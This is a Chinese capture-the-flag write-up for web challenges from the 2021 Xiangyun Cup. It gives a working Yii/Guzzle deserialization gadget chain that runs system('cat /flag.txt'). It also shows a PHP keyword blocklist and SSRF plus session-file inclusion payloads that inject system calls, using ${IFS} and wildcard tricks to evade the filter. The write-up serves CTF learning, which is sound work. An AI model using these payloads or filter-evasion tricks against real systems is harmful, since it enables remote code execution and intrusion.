部分web,太菜了有些做不出来
ezyii
参考:https://xz.aliyun.com/t/9948
不过后来第四条链子被作者删了。
代码如下:
1 |
|
2 | namespace Codeception\Extension{ |
3 | use Faker\DefaultGenerator; |
4 | use GuzzleHttp\Psr7\AppendStream; |
5 | class RunProcess{ |
6 | protected $output; |
7 | private $processes = []; |
8 | public function __construct(){ |
9 | $this->processes[]=new DefaultGenerator(new AppendStream()); |
10 | $this->output=new DefaultGenerator('jiang'); |
11 | } |
12 | } |
13 | echo base64_encode(serialize(new RunProcess())); |
14 | } |
15 | |
16 | namespace Faker{ |
17 | class DefaultGenerator |
18 | { |
19 | protected $default; |
20 | |
21 | public function __construct($default = null) |
22 | { |
23 | $this->default = $default; |
24 | } |
25 | } |
26 | } |
27 | namespace GuzzleHttp\Psr7{ |
28 | use Faker\DefaultGenerator; |
29 | final class AppendStream{ |
30 | private $streams = []; |
31 | private $seekable = true; |
32 | public function __construct(){ |
33 | $this->streams[]=new CachingStream(); |
34 | } |
35 | } |
36 | final class CachingStream{ |
37 | private $remoteStream; |
38 | public function __construct(){ |
39 | $this->remoteStream=new DefaultGenerator(false); |
40 | $this->stream=new PumpStream(); |
41 | } |
42 | } |
43 | final class PumpStream{ |
44 | private $source; |
45 | private $size=-10; |
46 | private $buffer; |
47 | public function __construct(){ |
48 | $this->buffer=new DefaultGenerator('j'); |
49 | include("closure/autoload.php"); |
50 | $a = function(){system('cat /flag.txt');}; |
51 | $a = \Opis\Closure\serialize($a); |
52 | $b = unserialize($a); |
53 | $this->source=$b; |
54 | } |
55 | } |
56 | } |
安全检测
通过POST请求发现报错,代码中使用file_get_contents,
第一时间想到了利用伪协议读取,试了好多个,发现不是被禁用了就是不行
1 | POST /check2.php HTTP/1.1 |
2 | Host: eci-2zefzyj8kapkgt0oad3m.cloudeci1.ichunqiu.com |
3 | |
4 | url1=http://ss123.828.22.1/ |
后面进行目录扫描,发现存在admin文件夹,尝试访问admin文件夹,payload:http://127.0.0.1/admin/
继续访问include123.php:http://127.0.0.1/admin/include123.php
1 |
|
2 | $u=$_GET['u']; |
3 | |
4 | $pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where"; |
5 | $pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert"; |
6 | $pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore"; |
7 | $pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr"; |
8 | $pattern .="|file|dict|gopher"; |
9 | //累了累了,饮茶先 |
10 | |
11 | $vpattern = explode("|",$pattern); |
12 | |
13 | foreach($vpattern as $value){ |
14 | if (preg_match( "/$value/i", $u )){ |
15 | echo "检测到恶意字符"; |
16 | exit(0); |
17 | } |
18 | } |
19 | |
20 | include($u); |
21 | |
22 | |
23 | show_source(__FILE__); |
24 |
|
测试了好多个都不行,查看了下session文件包含漏洞,应该是这个。
1 | 常见的php-session存放位置: |
2 | /var/lib/php/sess_PHPSESSID |
3 | /var/lib/php/sess_PHPSESSID |
4 | /tmp/sess_PHPSESSID |
5 | /tmp/sessions/sess_PHPSESSID |
执行下phpinfo成功。
1 | payload:http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test= =phpinfo(); |
2 | "xx" 为PHP短标签,同等与 echo "xxx" = |
执行lS试试,这边利用了${IFS}
代替了空格
1 | payload:http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('ls${IFS}/');?> |
1 | bin boot dev etc getflag.sh home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var var |
发现根目录下存在getflag.sh,运行下试试,由于flag被过滤,所以这边利用fl?g来代替flag
1 | payload:http://127.0.0.1/admin/include123.php?u=/tmp/sess_bedc37fbe5d2e7b064d01cce92e65182&test=<?=system('.${IFS}/getfl?g.sh');?> |
参考
一篇文章带你理解漏洞之 PHP 文件包含漏洞
文件包含漏洞
yii 2.0.42 最新反序列化利用全集
[祥云杯2021] wp